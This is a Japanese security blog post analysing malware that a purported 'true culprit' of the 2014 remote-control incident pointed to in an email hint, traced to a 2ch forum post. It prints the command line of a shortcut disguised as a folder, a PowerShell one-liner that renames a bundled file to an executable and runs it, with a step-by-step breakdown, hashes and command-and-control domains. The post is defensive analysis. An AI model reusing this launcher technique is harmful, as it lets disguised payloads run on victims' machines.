piyolog

piyokangoの備忘録です。セキュリティの出来事を中心にまとめています。このサイトはGoogle Analyticsを利用しています。

2014年6月1日の真犯人メールおまけのヒントに関連する情報をまとめてみた。

2014年6月1日に遠隔操作事件の真犯人を称する人物(真偽不明)からまた関係各方面にメールが送信されたようです。ここではメール文中に記載されていたヒントに関連する情報についての情報をメモとしてまとめます。

メール文中、おまけに記載された内容

■おまけ

この前、2ちゃんねるにウイルスを貼ったら踏み台がたくさん集まりました。

なのでまたいつでもゲームを始めることも可能です。

ヒント:poverty1398836253

2chスレッドに該当するスレッドが存在

fox.2ch.net/test/read.cgi/poverty/1398836253/

当該スレッドにマルウェアをaxfcにアップしたURLの書込みが存在

http://fox.2ch.net/test/read.cgi/poverty/1398836253/287

  • 書込み日時:2014/04/30(水) 18:49:36.14

287 :番組の途中ですがアフィサイトへの転載は禁止です:2014/04/30(水) 18:49:36.14 id:MVJERRI20
XXXX://www1.axfc.net/u/3234308
pass:news

XXXX://www.shiroutodaisuki.net/ck/ckayaka101.jpg
XXXX://www.shiroutodaisuki.net/ck/ckayaka102.jpg
XXXX://www.shiroutodaisuki.net/ck/ckayaka103.jpg
XXXX://www.shiroutodaisuki.net/ck/ckayaka104.jpg

http://fox.2ch.net/test/read.cgi/poverty/1398836253/287
  • axfcのリンクは5月31日時点で既に削除済み。
  • 一緒に書込みの合ったファイルは無害のように見える。
FileName SHA256
FC2.rar 8a73b0fd8629d9bbf8a65d65d293e1b449744686200cd935b21130f8b6f720ed
ckayaka101.jpg 25f0a897fa1cc5c273d4c708b4a26bd3c9daa17f1d8bbfe006fa6cfeec28d361
ckayaka102.jpg bfa6c3608eed5218166583f89119bb23816611802c6c074d6c7188616347fd1b
ckayaka103.jpg 6f40497ce10dc13629cec264377f40de226484e511816da923aedc179945c609
ckayaka104.jpg b4fadf852663d21f18872ee90bd0b85414b67e249fc91756578fd3029daf6e1d

axfcにアップされていたマルウェアの情報

FileName SHA256
desktop.ini(x.exe) d06afedee6372107b088817ad4aa70c4bb08a8afa72365a190fb6cdf65df7f3c
mov.lnk 8429a8bd172d90c799dbb0e52dbec7b51eb45ecfed604ec2f237fd7e3db90946
thumbs.db 不明

フォルダに偽装したショートカットファイル

  • リンク先に次の文字列が指定されている。

C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe md 'mov' ;del 'mov.lnk' ;saps mov ;mv thumbs.db mov\mov.flv;sp mov\mov.flv attributes Archive;mv 'desktop.ini' '%temp%\x.exe';saps '%temp%\x.exe';

  • ショートカットファイルを実行すると一緒に添付されていたマルウェアがコピーされた上で実行される。
文字列 コマンド 内容
md 'mov' ; mkdir movというディレクトリを作成する。
del 'mov.lnk' ; Remove-Item 実行されたショートカットファイル(mov.lnk)を削除する。
saps mov ; Start-Process movフォルダをExplorerで開く。
mv thumbs.db mov\mov.flv; Move-Item thumbs.dbファイルをmov.flvファイルにリネームし、movフォルダに移動する。
sp mov\mov.flv attributes Archive; Set-ItemProperty mov.flvの属性を変更し、アーカイブ可能にする。
mv 'desktop.ini' '%temp%\x.exe'; Move-Item desktop.iniをx.exeにリネームし、%TEMP%フォルダに移動する。
saps '%temp%\x.exe' Start-Process x.exe(Neurevt)を実行する。

通信先

  • 89.248.172.104に対して次のドメインのいずれかより通信する模様。
  • 当該IPアドレスへは2014年6月1日時点でアクセス可能。

zosx.asia
7cce.asia
3jdy.asia
o8dj.asia
ailq.asia
y7ah.asia
ajib.asia
brt8.asia
8i7h.asia
zign.asia

http://blogs.yahoo.co.jp/fireflyframer/32721019.html